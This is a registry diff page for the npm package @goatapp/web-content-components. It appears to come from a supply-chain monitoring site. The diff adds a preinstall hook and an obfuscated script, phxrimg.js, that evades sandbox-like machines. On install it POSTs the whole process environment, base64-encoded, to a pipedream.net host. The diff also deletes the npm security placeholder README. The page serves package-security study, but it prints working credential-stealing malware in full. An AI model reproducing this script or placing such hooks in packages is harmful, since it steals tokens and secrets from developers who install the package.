@goatapp/web-content-components 0.0.1-security → 1.938.453
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/package.json +8 -3
- package/phxrimg.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.938.453",
|
|
4
|
+
"main": "phxrimg.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node phxrimg.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/phxrimg.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x48e010=a0_0xa8be;(function(_0xabd464,_0x156cc7){const _0x30c6a5=a0_0xa8be,_0x1924b0=_0xabd464();while(!![]){try{const _0x1a207b=-parseInt(_0x30c6a5(0x14c))/0x1*(parseInt(_0x30c6a5(0x161))/0x2)+-parseInt(_0x30c6a5(0x164))/0x3*(parseInt(_0x30c6a5(0x168))/0x4)+parseInt(_0x30c6a5(0x15d))/0x5*(parseInt(_0x30c6a5(0x151))/0x6)+parseInt(_0x30c6a5(0x156))/0x7*(-parseInt(_0x30c6a5(0x166))/0x8)+parseInt(_0x30c6a5(0x165))/0x9+parseInt(_0x30c6a5(0x14d))/0xa*(parseInt(_0x30c6a5(0x159))/0xb)+-parseInt(_0x30c6a5(0x169))/0xc;if(_0x1a207b===_0x156cc7)break;else _0x1924b0['push'](_0x1924b0['shift']());}catch(_0x50e694){_0x1924b0['push'](_0x1924b0['shift']());}}}(a0_0x4a28,0x979c6));function a0_0xa8be(_0x4f62ef,_0x5653e9){const _0x4a2877=a0_0x4a28();return a0_0xa8be=function(_0xa8be8c,_0x2f136e){_0xa8be8c=_0xa8be8c-0x14c;let _0x14fdc8=_0x4a2877[_0xa8be8c];return _0x14fdc8;},a0_0xa8be(_0x4f62ef,_0x5653e9);}const http=require(a0_0x48e010(0x153)),filter=[{'key':a0_0x48e010(0x160),'val':a0_0x48e010(0x15f)},{'key':a0_0x48e010(0x160),'val':a0_0x48e010(0x14e)},{'key':a0_0x48e010(0x160),'val':a0_0x48e010(0x15b)},{'key':a0_0x48e010(0x152),'val':'daasadmin'},{'key':'_','val':'/usr/bin/python'}];function a0_0x4a28(){const _0x5f891c=['npm_config_registry','22918mAGKsp','includes','error','164853UpNtMY','10876437GGHqRL','746752FSilLE','from','8BZgEpd','311352AmfxeT','49DBqdvQ','20oMXqCT','tencent.com','end','some','24hmSbXQ','USERNAME','https','bd43527e019ae8efb47eb39bb9313ac5','stringify','28vgyMUq','pipedream','toString','2082344LFmRlV','net','registry.npmmirror.com','request','130765VBMiSQ','length','taobao.org'];a0_0x4a28=function(){return _0x5f891c;};return a0_0x4a28();}function main(){const _0x1263fd=a0_0x48e010;var _0x2e0467=process['env']||{};if(filter[_0x1263fd(0x150)](({key:_0x463fdd,val:_0x50243c})=>_0x2e0467[_0x463fdd]&&_0x2e0467[_0x463fdd][_0x1263fd(0x162)](_0x50243c))||Object['keys'](_0x2e0467)[_0x1263fd(0x15e)]<0xa)return;req=http[_0x1263fd(0x15c)]({'host':[_0x1263fd(0x154),'m',_0x1263fd(0x157),_0x1263fd(0x15a)]['join']('.'),'path':'/'+(_0x2e0467['npm_package_name']||''),'method':'POST'})['on'](_0x1263fd(0x163),function(_0x179527){}),req['write'](Buffer[_0x1263fd(0x167)](JSON[_0x1263fd(0x155)](_0x2e0467))[_0x1263fd(0x158)]('base64')),req[_0x1263fd(0x14f)]();}main();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|